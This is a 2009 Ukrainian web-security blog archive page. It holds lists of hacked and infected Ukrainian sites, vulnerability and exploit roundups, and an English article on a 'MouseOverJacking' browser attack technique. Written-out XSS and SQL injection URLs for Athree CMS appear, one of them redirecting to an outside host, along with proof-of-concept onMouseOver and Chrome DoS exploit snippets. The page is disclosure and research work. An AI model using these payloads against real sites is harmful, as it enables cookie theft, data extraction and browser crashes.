Архів за Грудень, 2009

З Новим Роком!

23:49 31.12.2009

В зв’язку з Новим Роком, що наближається, я поздоровляю вас з Новим Роком!

Бажаю всього найкращого вам в новому році і особливо безпеки вам і вашим сайтам ;-) .

Щоб в новому році ваші сайти не були серед числа похаканих чи інфікованих сайтів. Слідкуйте за безпекою власних сайтів і тоді з ними все буде добре.

Похакані сайти №77

22:44 31.12.2009

Після попереднього дослідження похаканих сайтів, приведу нову інформацію про взломані сайти. З числа українських сайтів.

  • http://hyundai.com.ua (хакером Qasim) - причому спочатку сайт був взломаний 25.11.2009 Qasim, а 22.12.2009 взломаний mc_intikam. Схоже, що сайт постійно хакається, як і деякі інші сайти в Уанеті
  • http://dneprzori.com (хакером Black^Monster)
  • http://www.koras.com.ua (хакером marslinio) - 20.12.2009, зараз сайт вже виправлений адмінами
  • http://info.wols.com.ua (хакером Kam_06) - 22.12.2009, зараз сайт вже виправлений адмінами (сайт переїхав на інший домен)
  • http://yoga.kr.ua (хакером Mr.D4rK) - 02.12.2009, зараз сайт вже виправлений адмінами

Переповнення буфера в модулі Perl DBD::Pg

20:02 31.12.2009

Виявлене переповнення буфера в модулі Perl DBD::Pg.

Уразливі версії: perl-DBD-Pg 2.x.

Переповнення буфера в pg_getline, DoS.

Добірка уразливостей

16:12 31.12.2009

В даній добірці уразливості в веб додатках:

  • Multiple Vulnerabilities in Cisco PIX and Cisco ASA (деталі)
  • Backdoor in com_rsgallery2 gallery extension for joomla (деталі)
  • Vanilla v.1.1.7 Cross-Site Scripting (деталі)
  • AdPeeps 8.5d1 - XSS and HTML Injection Vulnerabilities (деталі)
  • MULTIPLE REMOTE VULNERABILITIES Small Pirates v-2.1 (деталі)
  • RCE vulnerability in ecshop 2.6.2 (деталі)
  • A-Link WL54AP3 and WL54AP2 CSRF+XSS vulnerability (деталі)
  • MULTIPLE SQL INJECTION VULNERABILITIES Online Grades & Attendance v-3.2.6 (деталі)
  • OCS Inventory NG 1.02 - Multiple SQL Injections (деталі)
  • (Post Form –> Parent Register (name)) Credentials Changer (SQLi) EXPLOIT Online Grades & Attendance v-3.2.6 (деталі)

Численні уразливості на c8.net.ua

23:53 30.12.2009

У травні, 05.05.2009, я знайшов численні Cross-Site Scripting уразливості на проекті http://c8.net.ua (банерна мережа). Про що найближчим часом сповіщу адміністрацію проекту.

Проблема така ж сама як і випадку численних уразливостей на www.banner.kiev.ua.

У флеш баннерах на b.c8.net.ua, які також доступні на c8.net.ua, є XSS уразливість. Якщо вони зроблені згідно з рекомендаціями банерної системи, то можлива XSS атака (strictly social XSS) через параметр url, або інші параметри (при кліку на банер). Про подібну атаку я вже писав в статті XSS уразливості в 8 мільйонах флеш файлах.

XSS (флешка з target = “_blank”):

Для різних флеш банерів URL сайта заноситься через різні параметри (url, link1, clickTAG або clickTag).

Google проіндексував на даному сайті 44 флеш банери, але їх може бути набагато більше. Файл банера, який я використав для прикладу, має ім’я 5371.swf, тобто в системі може бути більше 5000 уразливих флеш банерів.

Вийшли PHP 5.3 та PHP 5.3.1

22:42 30.12.2009

Ще до виходу PHP 5.2.11 у вересні, вийшов PHP 5.3. Вихід нової гілки PHP відбувся 30.06.2009 і даний реліз є значним покращенням 5.x серії.

А вже у листопаді, 19.11.2009, вийшов PHP 5.3.1. В якому виправлено більше 100 помилок, в тому числі й декілька уразливостей. Даний реліз направлений на покращення стабільності та безпеки гілки 5.3.x.

Cеред секюріті покращень та виправлень в PHP 5.3.1:

  • Додана “max_file_uploads” INI директива, що може бути задана для обмеження кількості завантажень файлів для кожного запиту до 20 по замовчуванню, для запобігання можливій DOS через вичерпання тимчасових файлів.
  • Додані пропущені перевірки навколо обробки exif.
  • Виправлений обхід safe_mode в tempnam().
  • Виправлений обхід open_basedir в posix_mkfifo().
  • Виправлений слабий safe_mode_include_dir.

По матеріалам http://www.php.net.

Нові уразливості в Athree CMS

19:38 30.12.2009

05.11.2009

У березні, 09.03.2009, я знайшов Cross-Site Scripting, SQL DB Structure Extaction та SQL Injection уразливості в системі Athree CMS (Athree CMS Lite). Як раз коли виявив уразливості на www.cctvua.com, де і використовується цей движок.

Раніше я вже писав про уразливості в Athree CMS.

Детальна інформація про уразливості з’явиться пізніше.

30.12.2009

XSS:

http://site/?p=1;c=1;s=28/*%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/?p=1;c=0/*%3Cscript%3Ealert(document.cookie)%3C/script%3E;s=28
http://site/?p=1;c=0/*%3Cscript%3Edocument.location%3D'http://websecurity.com.ua'%3C/script%3E;s=28

SQL DB Structure Extraction:

http://site/?p=1;a=1′

SQL Injection:

http://site/?p=1;a=version()

Добірка експлоітів

16:21 30.12.2009

В даній добірці експлоіти в веб додатках:

  • Joomla Component com_jumi (fileid) Blind SQL Injection Exploit (деталі)
  • The Recipe Script 5 Remote XSS Vulnerability (деталі)
  • phportal v1 (topicler.php id) Remote SQL Injection Vulnerability (деталі)
  • vBulletin Radio and TV Player Add-On HTML Injection Vulnerability (деталі)
  • Netgear DG632 Router Remote Denial of Service Vulnerability (деталі)
  • Netgear DG632 Router Authentication Bypass Vulnerability (деталі)
  • phpCollegeExchange 0.1.5c (listing_view.php itemnr) SQL Injection Vuln (деталі)
  • Joomla Component com_ijoomla_rss Blind SQL Injection Exploit (деталі)
  • XOOPS <= 2.3.3 Remote File Disclosure Vulnerability (.htaccess) (деталі)
  • phpFK 7.03 (page_bottom.php) Local File Inclusion Vulnerability (деталі)
  • phportal 1.0 Insecure Cookie Handling Vulnerability (деталі)
  • FretsWeb 1.2 (name) Remote Blind SQL Injection Exploit (деталі)
  • FretsWeb 1.2 Multiple Local File Inclusion Vulnerabilities (деталі)
  • fuzzylime cms <= 3.03a Local Inclusion / Arbitrary File Corruption PoC (деталі)
  • Exploits BLIND SQL INJECTION (GET var ‘AlbumID’) RTWebalbum 1.0.462 (деталі)

Інфіковані сайти №5

22:47 29.12.2009

Після попереднього дослідження інфікованих сайтів, приведу нову інформацію про заражені сайти. З числа українських сайтів.

Ось п’ятірка інфікованих сайтів в Уанеті:

  • http://vip-love.com.ua - інфекція була виявлена 26.12.2009. Частина цього сайта була внесена до переліку сайтів із підозрілою активністю 2 рази протягом останніх 90 днів. Зараз сайт не входить до переліку підозрілих.
  • http://bronedvery.com.ua - інфекція була виявлена 19.12.2009. Частина цього сайта була внесена до переліку сайтів із підозрілою активністю 4 рази протягом останніх 90 днів. Зараз сайт входить до переліку підозрілих.
  • http://viptourism.org.ua - інфекція була виявлена 17.12.2009. Частина цього сайта була внесена до переліку сайтів із підозрілою активністю 5 разів протягом останніх 90 днів. Зараз сайт входить до переліку підозрілих.
  • http://stroydetal.crimea.ua - інфекція була виявлена 28.12.2009. Частина цього сайта була внесена до переліку сайтів із підозрілою активністю 1 раз протягом останніх 90 днів. Зараз сайт входить до переліку підозрілих.
  • http://concol.com.ua - інфекція була виявлена 20.10.2009. Частина цього сайта була внесена до переліку сайтів із підозрілою активністю 2 рази протягом останніх 90 днів. Зараз сайт не входить до переліку підозрілих.

MouseOverJacking attacks

20:06 29.12.2009

This is English version of my MouseOverJacking attacks article.

Last year I made an announcement of MouseOverJacking - at 12.12.2008 in WASC Mailing List, and at 17.12.2008 at my site. But only now I found time to write an article about it.

MouseOverJacking - it’s a new kind of attacks on web browsers, developed by me in September 2008. These attacks can be used for using of different vulnerabilities in browsers or web sites, where pointing of mouse cursor at an object is needed. And so with help of MouseOverJacking technique it’s possible to intercept cursor’s move and to conduct an attack.

In article Clickjacking Details RSnake wrote about this attack vector. But I first gave example of this attack vector a month before (yet before first announcement of Clickjacking). Besides, he described very briefly this attack vector, which required separate article, which I did in my article.

The idea of MouseOverJacking attacks.

Main idea of this attack, on which I accented already in my announcement, that for conducting of this attack it’s needed only single move of mouse cursor. Only moving of cursor at one pixel in any direction (only one small move) - and it’ll trigger an attack.

If in ClickJacking a victim must to do a click, then in MouseOverJacking no click is required, only moving of cursor ;-) . So users of Internet must be careful not just with clicks, but even with moves of cursor.

The difference between common attack with using of onMouseOver event and MouseOverJacking attack in that, that in common attack it’s needed that a victim moves his cursor over required object (at a page), so the attack pass successfully. And in MouseOverJacking attack this process is going automatically, because a victim only needs to make single move at one pixel (which will happened right away at visiting of a page). So MouseOverJacking is designed for automation of attacks with using of onMouseOver event (in IE also onMouseEnter can be used), to increase their effectiveness.

Possibilities of using of MouseOverJacking.

There are possible the next attacks via MouseOverJacking:

1. XSS attacks with using of onMouseOver event.
2. DoS attacks on browsers.
3. Other attacks at pointing of cursor.

For conduction of MouseOverJacking attacks it’s needed to ensnare victim at the page with code of exploit (which can be made with using of CSS or JavaScript).

XSS attacks with using of onMouseOver event.

It’s possible to intercept onMouseOver events in Cross-Site Scripting vulnerabilities, when other vectors of XSS attacks are impossible at the site. For example, in case of filtration at the server or using of WAF.

For this in some cases it’s possible to use CSS. Or for this it’s possible to use invisible iframe, which is placed under user’s cursor (similarly to method of ClickJacking attacks). For this attack it’s needed to use JavaScript.

DoS attacks on browsers.

It’s possible to conduct DoS attacks on browsers, as I showed it on example of DoS vulnerability in Google Chrome in September 2008 during of conducting of Day of bugs in Google Chrome project. I called this attack DoS via MouseOver.

Attack is possible at presence of appropriate DoS vulnerability in browser. For this attack it’s possible to use either JavaScript, or CSS, as in case of my exploit for Chrome.

Other attacks at pointing of cursor.

There are also possible other attacks, where it’s possible to use MouseOverJacking. E.g., CSRF attacks, if some event takes place at pointing of mouse cursor at some object at the site.

Examples of MouseOverJacking attacks.

I already mentioned example of DoS attack via MouseOverJacking (on Chrome) with exploit which uses CSS. Here is main part of a code of exploit:

<a style="width:100%;height:100%;display:block" href="dos:%"></a>

In case of presence of persistent XSS vulnerability or uploader at the site (where other vectors of attack are impossible, except via events of html objects), it’s possible to place the next code:

<a href="#" style="width:100%;height:100%;display:block;position:absolute;top:0px;left:0px" onMouseOver="alert(document.cookie)">&nbsp;</a>

Recently I wrote about XSS vulnerability in Invision Power Board found by Xacker. In his advisory he gave an example of XSS attack with using of onMouseOver for bypassing filters in IPB 3.0.4. In this case it’s just XSS attack via onMouseOver (which I refer to Strictly social XSS), when it’s needed to wait until admin will point cursor at a text, to execute a code. But if to use my MouseOverJacking technique, then effectiveness of the attack will rise, because a code will execute right away when user will visit a page.

Nice example of XSS attacks with using of onMouseOver is Cross-Site Scripting vulnerability in WordPress 2.8.1. The most interesting is that, that onMouseOver event is using for conducting of click (the idea itself is very interesting offered by superfreakaz0rz).

In given exploit for this vulnerability it’s needed to send request at the site and wait until admin will fall into a trap (i.e. it’s common XSS attack via onMouseOver). To speed up this process it’s possible to use MouseOverJacking attack (with invisible iframe or via CSS). And taking into account that after pointing of cursor a click will trigger, then this attack can be refer to kind of joint MouseOverJacking + ClickJacking attacks.

Protection from MouseOverJacking.

If JavaScript is using for MouseOverJacking attack, then for protection against these attacks it’s possible to turn off JavaScript in browser. Either manually in browser, or with help of proper plugins for browser.

If JavaScript isn’t using for MouseOverJacking attack, but CSS is using, then above-mentioned method will not help. But if MouseOverJacking is required for conducting of XSS attacks, then turning off JS will protect against XSS attacks (even if MouseOverJacking is realized via CSS). But it’ll not help against DoS attacks via MouseOverJacking.

In case of DoS attacks or any other attacks via MouseOverJacking with using of CSS, caution of user will help (it’s needed to visit reliable resources) and updating of browser to last version.